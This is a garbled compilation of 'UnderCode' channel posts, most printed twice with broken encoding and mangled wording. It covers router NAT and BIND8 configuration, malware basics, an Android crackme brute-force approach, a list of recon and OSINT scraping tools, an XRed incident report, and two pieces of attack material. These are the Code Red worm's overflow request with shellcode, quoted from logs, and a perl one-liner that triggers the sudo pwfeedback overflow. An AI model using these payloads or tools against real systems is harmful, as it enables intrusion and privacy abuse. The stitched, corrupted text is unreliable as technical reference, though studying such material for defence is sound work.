β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Configuration examples of proxy server and router in LAN FOR ANONYMITY REASONS BY UNDERCODE
fb.com/UndercOdeTestingCompany
PART 2
B) 1 ) configuration of the router
config T
IP NAT the pool c2610 211.90.139.41 211.90.139.42 Netmask 255.255.255.252
(Define an address pool c2601, within which includes two free legal IP address for NAT use conversion)
int E0 / 0
IP address 192.168.0.3 255.255.255.0
IP NAT inside
Exit
> (provided the IP address of the Ethernet port, and set its internal network to connect the port)
interface S0 / 0
IP address 211.90.137.25 255.255.255.252
ip nat outside
exit
(Set the IP address of the WAN port and set it as the port to connect to the external network)
ip route 0.0.0.0 0.0.0.0 211.90.137.26
(Set dynamic routing)
access-list 2 permit 192.168.0.1 0.0.0.255
(establish an access control list )
! Dynamic NAT
!
2) Ip nat inside source list 2 pool c2610 overload
(establish dynamic address translation)
line console 0
exec-timeout 0 0
!
Line vty 0 4
end
wr
(Save the settings)
3) Workstation configuration
requires static IP address, set in the TCP / IP properties and set off to network 192.168.0.3 (the IP address of the router Ethernet port), the address is provided, the Internet browser and other tools to provide access to the DNS in No special settings are required.
Second, access to INTERNET resources through a proxy server configuration
Written by uNDERCoDE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Configuration examples of proxy server and router in LAN FOR ANONYMITY REASONS BY UNDERCODE
fb.com/UndercOdeTestingCompany
PART 2
B) 1 ) configuration of the router
config T
IP NAT the pool c2610 211.90.139.41 211.90.139.42 Netmask 255.255.255.252
(Define an address pool c2601, within which includes two free legal IP address for NAT use conversion)
int E0 / 0
IP address 192.168.0.3 255.255.255.0
IP NAT inside
Exit
> (provided the IP address of the Ethernet port, and set its internal network to connect the port)
interface S0 / 0
IP address 211.90.137.25 255.255.255.252
ip nat outside
exit
(Set the IP address of the WAN port and set it as the port to connect to the external network)
ip route 0.0.0.0 0.0.0.0 211.90.137.26
(Set dynamic routing)
access-list 2 permit 192.168.0.1 0.0.0.255
(establish an access control list )
! Dynamic NAT
!
2) Ip nat inside source list 2 pool c2610 overload
(establish dynamic address translation)
line console 0
exec-timeout 0 0
!
Line vty 0 4
end
wr
(Save the settings)
3) Workstation configuration
requires static IP address, set in the TCP / IP properties and set off to network 192.168.0.3 (the IP address of the router Ethernet port), the address is provided, the Internet browser and other tools to provide access to the DNS in No special settings are required.
Second, access to INTERNET resources through a proxy server configuration
Written by uNDERCoDE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to stop and remove viruses and other malware
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) What is a computer virus?
A computer virus is a small software program that can spread from one computer to another and interfere with the operation of the computer. Computer viruses can damage or delete data on your computer, use an email program to spread viruses to other computers, or even delete everything on your hard drive.
2) Computer viruses usually spread through attachments in e-mail messages or instant messaging messages. Therefore, never open an e-mail attachment unless you know the identity of the sender or this is exactly the e-mail attachment you are looking for. Viruses can disguise themselves as funny pictures, greeting cards, or attachments in audio and video files. Computer viruses are also spread through Internet downloads. They can be hidden in pirated software or other files or programs you download.
3) Computer virus symptoms
For information about computer virus symptoms, go to the
Microsoft Computer Security website.
> detailed ...
4)What is a worm?
A worm is a type of computer code that can spread without user interaction. Most worms start as email attachments and infect computers once opened. The worm scans files on the infected computer that contain email addresses, such as address books or temporary web pages. The worm will use these addresses to send infected emails, and it will often mimic (or spoof) the "sender" address in subsequent emails to make the infected messages appear to come from people they know. The worm then spreads automatically via email, network, or operating system vulnerabilities, often crushing the system before knowing why. Worms don't always damage computers, but they often cause performance and stability issues on computers and networks.
5) What is a Trojan horse?
Trojan horse is a malware program hidden inside other programs. When it enters your computer, it is hidden in legitimate programs such as screen savers. It then places code into the operating system that gives hackers access to the affected computer. Trojan horses usually do not spread on their own. They can spread through viruses, worms, or downloaded software.
6) What is spyware?
Spyware can be installed on your computer without your knowledge. These programs can change your computer configuration or collect advertising data and personal information. Spyware can track Internet search habits, or it can redirect your web browser to other websites that you didn't plan to visit.
7) What is rogue security software?
Rogue security software programs try to make you think your computer is infected with a virus and usually prompts you to download or buy a product to remove the virus. The names of these products often include words such as antivirus, protection, security, protection or repair. This approach makes them sound legitimate. They usually run immediately after you download or the next time you start your computer. Rogue security software prevents applications such as Internet Explorer from opening. Rogue security software may also show legitimate important Windows files as infections. Typical error messages or pop-up messages may include the following phrases:
caveat!
Computer is infected!
This computer is infected with spyware and adware.
π¦ What is malware?
Malware is designed to damage computer systems or take unnecessary action. Here are some examples of malware:
virus
worm
Trojan horse
Spyware
Rogue security software
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to stop and remove viruses and other malware
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) What is a computer virus?
A computer virus is a small software program that can spread from one computer to another and interfere with the operation of the computer. Computer viruses can damage or delete data on your computer, use an email program to spread viruses to other computers, or even delete everything on your hard drive.
2) Computer viruses usually spread through attachments in e-mail messages or instant messaging messages. Therefore, never open an e-mail attachment unless you know the identity of the sender or this is exactly the e-mail attachment you are looking for. Viruses can disguise themselves as funny pictures, greeting cards, or attachments in audio and video files. Computer viruses are also spread through Internet downloads. They can be hidden in pirated software or other files or programs you download.
3) Computer virus symptoms
For information about computer virus symptoms, go to the
Microsoft Computer Security website.
> detailed ...
4)What is a worm?
A worm is a type of computer code that can spread without user interaction. Most worms start as email attachments and infect computers once opened. The worm scans files on the infected computer that contain email addresses, such as address books or temporary web pages. The worm will use these addresses to send infected emails, and it will often mimic (or spoof) the "sender" address in subsequent emails to make the infected messages appear to come from people they know. The worm then spreads automatically via email, network, or operating system vulnerabilities, often crushing the system before knowing why. Worms don't always damage computers, but they often cause performance and stability issues on computers and networks.
5) What is a Trojan horse?
Trojan horse is a malware program hidden inside other programs. When it enters your computer, it is hidden in legitimate programs such as screen savers. It then places code into the operating system that gives hackers access to the affected computer. Trojan horses usually do not spread on their own. They can spread through viruses, worms, or downloaded software.
6) What is spyware?
Spyware can be installed on your computer without your knowledge. These programs can change your computer configuration or collect advertising data and personal information. Spyware can track Internet search habits, or it can redirect your web browser to other websites that you didn't plan to visit.
7) What is rogue security software?
Rogue security software programs try to make you think your computer is infected with a virus and usually prompts you to download or buy a product to remove the virus. The names of these products often include words such as antivirus, protection, security, protection or repair. This approach makes them sound legitimate. They usually run immediately after you download or the next time you start your computer. Rogue security software prevents applications such as Internet Explorer from opening. Rogue security software may also show legitimate important Windows files as infections. Typical error messages or pop-up messages may include the following phrases:
caveat!
Computer is infected!
This computer is infected with spyware and adware.
π¦ What is malware?
Malware is designed to damage computer systems or take unnecessary action. Here are some examples of malware:
virus
worm
Trojan horse
Spyware
Rogue security software
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ change your Internet Explorer proxy settings yourself, follow these steps:
twitter.com/UNdercOdetc
π¦ ππΌππ πππΈβπ :
1) Click "start"And click "Run".
2) In "run"Box, copy and paste the following:
reg add "HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings" / v ProxyEnable / t REG_DWORD / d 0 / f
3) Click "OK".
4) Click "start"And click "Run".
5) In "run"Box, copy and paste the following:
reg delete "HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings" / v ProxyServer / f
6) Click "OK".
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ change your Internet Explorer proxy settings yourself, follow these steps:
twitter.com/UNdercOdetc
π¦ ππΌππ πππΈβπ :
1) Click "start"And click "Run".
2) In "run"Box, copy and paste the following:
reg add "HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings" / v ProxyEnable / t REG_DWORD / d 0 / f
3) Click "OK".
4) Click "start"And click "Run".
5) In "run"Box, copy and paste the following:
reg delete "HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings" / v ProxyServer / f
6) Click "OK".
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE TESTING COMPANY (@UnderCodeTC) | Twitter
The latest Tweets from UNDERCODE TESTING COMPANY (@UnderCodeTC). πΈππ§πππππ & πΈππ¨ππͺπ€ ππ‘πππ₯ππ. Lebanon-North
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦DOMAINE NAME SERVICES :
DNS Configuration Reference
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
> As we all know, the DNS system used on the Internet was bind4, and
bind8 is the latter version of bind4. And bind4 compared, bind8 better, managers
can more fully control its behavior, but the difference between the two is still very large, changing
not only the format, you can have a lot of new concepts. The statements available in bind8 are logging,
options, zone, acl, key, trusted-keys, server, controls, include.
The instructions in it can be in the format of c, c ++, or shell / perl. I would like to introduce major
primary, secondary domain name server method of basic configuration to work with bind8 (they are on the internet
two kinds of domain name servers used mainly), if interested can refer to a deeper understanding of man and
RFC 882, RFC 883 , RFC 973, RFC 974, RFC 1033, RFC 1034, RFC1035,
RFC 1123, RFC 2308 "Name Server Operations Guide for BIND".
π¦ Necessary conditions for the master DNS server to work properly:
1) Install the bind8 software, which is available in many unix distributions You can find it in version,
or go to http://freesoft.online.sh.cn ,
ftp://studio.sinet.net.cn .
2) Several required configuration files:
named.conf
named.ca
named.local
mater file (that is, the zone file
in bind4) Among these configuration files, the most important is named.conf. Under / etc,
it is the default startup file when named is started. A typical The named.conf file includes at least
options, and zones. For example:
options {
directory "/ var / named";
};
zone "0.0.127.in-addr.arpa" in {
type master;
file "named.local";
};
"." Zone in {
type hint;
File "the named.ca";
};
Zone "99.cn.net" in {
type Master;
File "db.99.cn.net";
};
3) in it, options to define the path of the master file is stored, corresponds to a certain
field, here will find the named data files, require a www.example.. if the request,
the named will arrive at / var / named find db.exa .ample. net this file, find the ip of www.example...
zone define a domain, such as exa.mple.net this field, type type custom domain name server, master
stated that this is a primary domain name server, the first zone is defined as a local server to send back its own domain
master server, will address 127.0 .0.1 mapping to localhost, in almost all types of domain name servers where
you can see all this domain.
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦DOMAINE NAME SERVICES :
DNS Configuration Reference
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
> As we all know, the DNS system used on the Internet was bind4, and
bind8 is the latter version of bind4. And bind4 compared, bind8 better, managers
can more fully control its behavior, but the difference between the two is still very large, changing
not only the format, you can have a lot of new concepts. The statements available in bind8 are logging,
options, zone, acl, key, trusted-keys, server, controls, include.
The instructions in it can be in the format of c, c ++, or shell / perl. I would like to introduce major
primary, secondary domain name server method of basic configuration to work with bind8 (they are on the internet
two kinds of domain name servers used mainly), if interested can refer to a deeper understanding of man and
RFC 882, RFC 883 , RFC 973, RFC 974, RFC 1033, RFC 1034, RFC1035,
RFC 1123, RFC 2308 "Name Server Operations Guide for BIND".
π¦ Necessary conditions for the master DNS server to work properly:
1) Install the bind8 software, which is available in many unix distributions You can find it in version,
or go to http://freesoft.online.sh.cn ,
ftp://studio.sinet.net.cn .
2) Several required configuration files:
named.conf
named.ca
named.local
mater file (that is, the zone file
in bind4) Among these configuration files, the most important is named.conf. Under / etc,
it is the default startup file when named is started. A typical The named.conf file includes at least
options, and zones. For example:
options {
directory "/ var / named";
};
zone "0.0.127.in-addr.arpa" in {
type master;
file "named.local";
};
"." Zone in {
type hint;
File "the named.ca";
};
Zone "99.cn.net" in {
type Master;
File "db.99.cn.net";
};
3) in it, options to define the path of the master file is stored, corresponds to a certain
field, here will find the named data files, require a www.example.. if the request,
the named will arrive at / var / named find db.exa .ample. net this file, find the ip of www.example...
zone define a domain, such as exa.mple.net this field, type type custom domain name server, master
stated that this is a primary domain name server, the first zone is defined as a local server to send back its own domain
master server, will address 127.0 .0.1 mapping to localhost, in almost all types of domain name servers where
you can see all this domain.
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ NEWS β β β
1) We Start Using Pinterest
pinterest.com/UndercOdeOfficial
2) After 3 ban at github.com we decide to get another pro github account :
github.com/UndercOdeOfficial
π¦ Some Follow From you will appreciate it π
β β β ο½ππ»βΊπ«Δπ¬πβ NEWS β β β
1) We Start Using Pinterest
pinterest.com/UndercOdeOfficial
2) After 3 ban at github.com we decide to get another pro github account :
github.com/UndercOdeOfficial
π¦ Some Follow From you will appreciate it π
β β β ο½ππ»βΊπ«Δπ¬πβ NEWS β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Android Hacking- Simple algorithm analysis
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
New to Android dynamic debugging, and decided to use
1) First of all, without anti-debugging, he would not pretend to be cut off) Run the apk, enter the verification code, and pop up
2) Then use JEB to analyze the apk file to find the character string "Sorry, Fish!", Find the verification process, and find the verification function EatRice
3) So in libxy.so, find the function as follows. The dynamic debugging finds that the program first determines whether the first character of the input string is 'X' (0x58), whether the second character is '#' (0x23), and whether the string length Is 7, if these conditions are not met then wait 3s and then return 0. From this, it is judged that the verification code format should be: "X # -----", where "-" represents a temporarily unknown character. It is assumed here that the name of the string is szA.
4) The debugger finds that the program will calculate szA [1: 2], szA [2: 3], szA [3: 4], szA [4: 5], szA [5: 6] respectively and perform the calculation with the corresponding results. By comparison, if the results are correct, it is considered successful.
5) pecific algorithm is not described. Let βs look at the program. Let βs talk about the cracking process. Since the algorithm involves some shifts and feedback, it is difficult to push backwards (personally think) However, in the algorithm, the operation is performed once every two bits and each bit is a visible character (0x21 ~ 0x7e). Therefore, the idea here is to
explode bit by bit. In this example, when calculating szA [1: 2], szA [1] = '#' is known. Then szA [2] can be blasted,
and szA [2] is known during the calculation of szA [2: 3], szA [3]
can be blasted , and so on, the value of each bit can be blasted ,
And the calculation time complexity should also be O (1), that is, a maximum of (0x7e-0x21) * 5 = 0x1d1 operations to calculate the answer
π¦ will send later other parts
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Android Hacking- Simple algorithm analysis
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
New to Android dynamic debugging, and decided to use
1) First of all, without anti-debugging, he would not pretend to be cut off) Run the apk, enter the verification code, and pop up
2) Then use JEB to analyze the apk file to find the character string "Sorry, Fish!", Find the verification process, and find the verification function EatRice
3) So in libxy.so, find the function as follows. The dynamic debugging finds that the program first determines whether the first character of the input string is 'X' (0x58), whether the second character is '#' (0x23), and whether the string length Is 7, if these conditions are not met then wait 3s and then return 0. From this, it is judged that the verification code format should be: "X # -----", where "-" represents a temporarily unknown character. It is assumed here that the name of the string is szA.
4) The debugger finds that the program will calculate szA [1: 2], szA [2: 3], szA [3: 4], szA [4: 5], szA [5: 6] respectively and perform the calculation with the corresponding results. By comparison, if the results are correct, it is considered successful.
5) pecific algorithm is not described. Let βs look at the program. Let βs talk about the cracking process. Since the algorithm involves some shifts and feedback, it is difficult to push backwards (personally think) However, in the algorithm, the operation is performed once every two bits and each bit is a visible character (0x21 ~ 0x7e). Therefore, the idea here is to
explode bit by bit. In this example, when calculating szA [1: 2], szA [1] = '#' is known. Then szA [2] can be blasted,
and szA [2] is known during the calculation of szA [2: 3], szA [3]
can be blasted , and so on, the value of each bit can be blasted ,
And the calculation time complexity should also be O (1), that is, a maximum of (0x7e-0x21) * 5 = 0x1d1 operations to calculate the answer
π¦ will send later other parts
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC HACKERS SCRIPTS - KALI -TERMUX at GITHUB
Twitter.com/UndercOdeTC
π¦ Active Intelligence Gathering
1) EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness
2) AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot. https://github.com/jordanpotti/AWSBucketDump
3) AQUATONE is a set of tools for performing reconnaissance on domain names. https://github.com/michenriksen/aquatone
4) spoofcheck a program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. https://github.com/BishopFox/spoofcheck
5) Nmap is used to discover hosts and services on a computer network, thus building a "map" of the network. https://github.com/nmap/nmap
dnsrecon a tool DNS Enumeration Script. https://github.com/darkoperator/dnsrecon
6) dirsearch is a simple command line tool designed to brute force directories and files in websites. https://github.com/maurosoria/dirsearch
7) Sn1per automated pentest recon scanner. https://github.com/1N3/Sn1per
8) Social Mapper OSINT Social Media Mapping Tool, takes a list of names & images (or LinkedIn company name) and performs automated target searching on a huge scale across multiple social media sites. Not restricted by APIs as it instruments a browser using Selenium. Outputs reports to aid in correlating targets across sites. https://github.com/
9) SpiderLabs/social_mapper
skiptracer OSINT scraping framework, utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget. https://github.com/xillwillx/skiptracer
10) FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans. https://github.com/ElevenPaths/FOCA
11) theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from different public sources. https://github.com/laramies/theHarvester
12) Metagoofil is a tool for extracting metadata of public documents (pdf,doc,xls,ppt,etc) availables in the target websites. https://github.com/laramies/metagoofil
E N J O Y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC HACKERS SCRIPTS - KALI -TERMUX at GITHUB
Twitter.com/UndercOdeTC
π¦ Active Intelligence Gathering
1) EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness
2) AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot. https://github.com/jordanpotti/AWSBucketDump
3) AQUATONE is a set of tools for performing reconnaissance on domain names. https://github.com/michenriksen/aquatone
4) spoofcheck a program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. https://github.com/BishopFox/spoofcheck
5) Nmap is used to discover hosts and services on a computer network, thus building a "map" of the network. https://github.com/nmap/nmap
dnsrecon a tool DNS Enumeration Script. https://github.com/darkoperator/dnsrecon
6) dirsearch is a simple command line tool designed to brute force directories and files in websites. https://github.com/maurosoria/dirsearch
7) Sn1per automated pentest recon scanner. https://github.com/1N3/Sn1per
8) Social Mapper OSINT Social Media Mapping Tool, takes a list of names & images (or LinkedIn company name) and performs automated target searching on a huge scale across multiple social media sites. Not restricted by APIs as it instruments a browser using Selenium. Outputs reports to aid in correlating targets across sites. https://github.com/
9) SpiderLabs/social_mapper
skiptracer OSINT scraping framework, utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget. https://github.com/xillwillx/skiptracer
10) FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans. https://github.com/ElevenPaths/FOCA
11) theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from different public sources. https://github.com/laramies/theHarvester
12) Metagoofil is a tool for extracting metadata of public documents (pdf,doc,xls,ppt,etc) availables in the target websites. https://github.com/laramies/metagoofil
E N J O Y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Dangerous Virus Code Red (computer worm)
> server attack
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Code Red was a computer worm observed on the Internet on July 15, 2001. It attacked computers running Microsoft's IIS web server.
2) The Code Red worm was first discovered and researched by eEye Digital Security employees Marc Maiffret and Ryan Permeh when it exploited a vulnerability discovered by Riley Hassell. They named it "Code Red" because Code Red Mountain Dew was what they were drinking at the time.
π¦ Exploited vulnerability
3) The worm showed a vulnerability in the growing software distributed with IIS, described in Microsoft Security Bulletin MS01-033,[3] for which a patch had been available a month earlier.
4) The worm spread itself using a common type of vulnerability known as a buffer overflow. It did this by using a long string of the repeated letter 'N' to overflow a buffer, allowing the worm to execute arbitrary code and infect the machine with the worm. Kenneth D. Eichman was the first to discover how to block it, and was invited to the White House for his discovery.
π¦Worm payload:
5) The payload of the worm included:
> Defacing the affected web site to display:
HELLO! Welcome to http://www.worm.com! Hacked By xy
6) Other activities based on day of the month:
> Days 1-19: Trying to spread itself by looking for more IIS servers on the Internet.
> Days 20β27: Launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.[2]
> Days 28-end of month: Sleeps, no active attacks.
7) When scanning for vulnerable machines, the worm did not test to see if the server running on a remote machine was running a vulnerable version of IIS, or even to see if it was running IIS at all. Apache access logs from this time frequently had entries such as these:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
The worm's payload is the string following the last 'N'. Due to a buffer overflow, a vulnerable host interpreted this string as computer instructions, propagating the worm.
powred by wiki
Posted On UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Dangerous Virus Code Red (computer worm)
> server attack
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Code Red was a computer worm observed on the Internet on July 15, 2001. It attacked computers running Microsoft's IIS web server.
2) The Code Red worm was first discovered and researched by eEye Digital Security employees Marc Maiffret and Ryan Permeh when it exploited a vulnerability discovered by Riley Hassell. They named it "Code Red" because Code Red Mountain Dew was what they were drinking at the time.
π¦ Exploited vulnerability
3) The worm showed a vulnerability in the growing software distributed with IIS, described in Microsoft Security Bulletin MS01-033,[3] for which a patch had been available a month earlier.
4) The worm spread itself using a common type of vulnerability known as a buffer overflow. It did this by using a long string of the repeated letter 'N' to overflow a buffer, allowing the worm to execute arbitrary code and infect the machine with the worm. Kenneth D. Eichman was the first to discover how to block it, and was invited to the White House for his discovery.
π¦Worm payload:
5) The payload of the worm included:
> Defacing the affected web site to display:
HELLO! Welcome to http://www.worm.com! Hacked By xy
6) Other activities based on day of the month:
> Days 1-19: Trying to spread itself by looking for more IIS servers on the Internet.
> Days 20β27: Launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.[2]
> Days 28-end of month: Sleeps, no active attacks.
7) When scanning for vulnerable machines, the worm did not test to see if the server running on a remote machine was running a vulnerable version of IIS, or even to see if it was running IIS at all. Apache access logs from this time frequently had entries such as these:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
The worm's payload is the string following the last 'N'. Due to a buffer overflow, a vulnerable host interpreted this string as computer instructions, propagating the worm.
powred by wiki
Posted On UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 news from twitter.com/UndercOdeTC
> XRed virus attack on a company's (special in europ) remote office during the holiday season
1) Tencent Enterprise Security Emergency Response Center (hereinafter referred to as Tencent Security) received a request from an Internet company.
> A remote business tool and spreadsheet file shared by an internal business group of the company's internal work group was found to be infected with a virus, causing more than 200 employees' computers in the department. Being infected, the company was concerned that the security of the system's business was threatened.
π¦Troubleshoot the source of virus infection:
1) The company's early internal investigation: The company's network administrator noticed that the exe file of the remote office tool in the compressed package shared by an employee through the internal working group was infected, and the remote office tool exe provided by the company was a normal file. Therefore, the source of virus transmission is basically confirmed.
2) Tencent security engineer conducted a remote investigation on this and found that the computer suspected of being infected has the following phenomena:
a) Unzip the file on this computer and find that the uncompressed exe file is larger than the original file and has been infected.
b)Copy any exe file to the desktop and the exe file will be infected. After the infection, the file description is modified into a touchpad device driver. Based on this, it can be basically confirmed that the virus is the "Synaptics" worm that has been disclosed by peers.
c) Continued inspections revealed that the cracked version of the compression software on this poisoned computer did not find any βsupply chain pollutionβ issues. Basically, it can be confirmed that this personal computer was infected with XRed virus some time ago earlier. In this emergency, it was used as a work computer for remote office use. When sharing files externally, it was monitored by the company's IT staff and found abnormal.
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 news from twitter.com/UndercOdeTC
> XRed virus attack on a company's (special in europ) remote office during the holiday season
1) Tencent Enterprise Security Emergency Response Center (hereinafter referred to as Tencent Security) received a request from an Internet company.
> A remote business tool and spreadsheet file shared by an internal business group of the company's internal work group was found to be infected with a virus, causing more than 200 employees' computers in the department. Being infected, the company was concerned that the security of the system's business was threatened.
π¦Troubleshoot the source of virus infection:
1) The company's early internal investigation: The company's network administrator noticed that the exe file of the remote office tool in the compressed package shared by an employee through the internal working group was infected, and the remote office tool exe provided by the company was a normal file. Therefore, the source of virus transmission is basically confirmed.
2) Tencent security engineer conducted a remote investigation on this and found that the computer suspected of being infected has the following phenomena:
a) Unzip the file on this computer and find that the uncompressed exe file is larger than the original file and has been infected.
b)Copy any exe file to the desktop and the exe file will be infected. After the infection, the file description is modified into a touchpad device driver. Based on this, it can be basically confirmed that the virus is the "Synaptics" worm that has been disclosed by peers.
c) Continued inspections revealed that the cracked version of the compression software on this poisoned computer did not find any βsupply chain pollutionβ issues. Basically, it can be confirmed that this personal computer was infected with XRed virus some time ago earlier. In this emergency, it was used as a work computer for remote office use. When sharing files externally, it was monitored by the company's IT staff and found abnormal.
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Third, block virus transmission and repair programs :
(special X-Red Virus )
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) The company's IT staff immediately disconnected the infected machine from the network to prevent further spread.
2) After confirming that the computer housekeeper Cloud Master Defense can intercept the pathogen "Synaptics.exe", it immediately requested that computers without "Tencent T-sec Terminal Security Management System" be installed to install Tencent Computer Housekeeper.
3) The pathogen "Synaptics.exe" has more than 20,000 variants. The latest update was January 2020.
4) It is still active and it is recommended that companies upgrade anti-virus software in time to take precautions.
5) For infected computers, use Tencent Computer Manager (or Tencent T-sec Terminal Security Management System) to conduct a comprehensive check and repair of infected files. The XRed virus infection method is relatively special (for details, please refer to the "Detailed Analysis of Samples" section below). Tencent Computer Butler can accurately identify and repair it perfectly and restore the infected file to its original state.
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Third, block virus transmission and repair programs :
(special X-Red Virus )
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) The company's IT staff immediately disconnected the infected machine from the network to prevent further spread.
2) After confirming that the computer housekeeper Cloud Master Defense can intercept the pathogen "Synaptics.exe", it immediately requested that computers without "Tencent T-sec Terminal Security Management System" be installed to install Tencent Computer Housekeeper.
3) The pathogen "Synaptics.exe" has more than 20,000 variants. The latest update was January 2020.
4) It is still active and it is recommended that companies upgrade anti-virus software in time to take precautions.
5) For infected computers, use Tencent Computer Manager (or Tencent T-sec Terminal Security Management System) to conduct a comprehensive check and repair of infected files. The XRed virus infection method is relatively special (for details, please refer to the "Detailed Analysis of Samples" section below). Tencent Computer Butler can accurately identify and repair it perfectly and restore the infected file to its original state.
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ everyOne should take care from X-RED MALWARE, HIS ACTIVITY STARTED SINCE JAN 2020
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 Vulnerabilty from twitter.com/UndercOdeTC
> Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root
π¦ cyber-security-3400657_640
Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root
Author: @UndercOdeOfficialn Date: 2020-02-04 Category: security alerts , vulnerability events
> Apple security expert Joe Vennix has discovered a vulnerability (CVE-2019-18634) that allows unprivileged Linux and macOS users to run commands as root.
> This vulnerability can only be exploited in special configurations.
> The vulnerability can only be exploited if the "pwfeedback" option has been enabled in the sudo configuration file. The pwfeedback option for root allows visual feedback when the user enters a password.
> Experts point out that this vulnerability can be triggered even if the user is not in the user file.
π¦ ππΌππ πππΈβπ :
1) "You do not need root privileges to trigger this vulnerability, you just need to enable pwfeedback." Sudo developer Todd C. Miller wrote.
2) "When entering the password, you can enter sudo through the pipe to reproduce it. For example:"
$ perl -e 'print (("A" x 100. "\ x {00}") x 50)' | sudo -S id
Password: Segmentation fault
There are two reasons for this vulnerability:
3) The pwfeedback option is generally not ignored when reading from devices other than the terminal device. Due to the lack of a terminal, the version of the line erase character is always an initial value of 0.
If there is a write error, the code that erases the asterisk line will not reset the buffer position correctly, but it will reset the remaining buffer length. This will cause the getln () function to be written outside the buffer. "
4) If this option is enabled, you can change "Defaults pwfeedback" to "Defaults! Pwfeedback" in the user profile.
5) The sudo maintainer released version 1.8.31 of root.
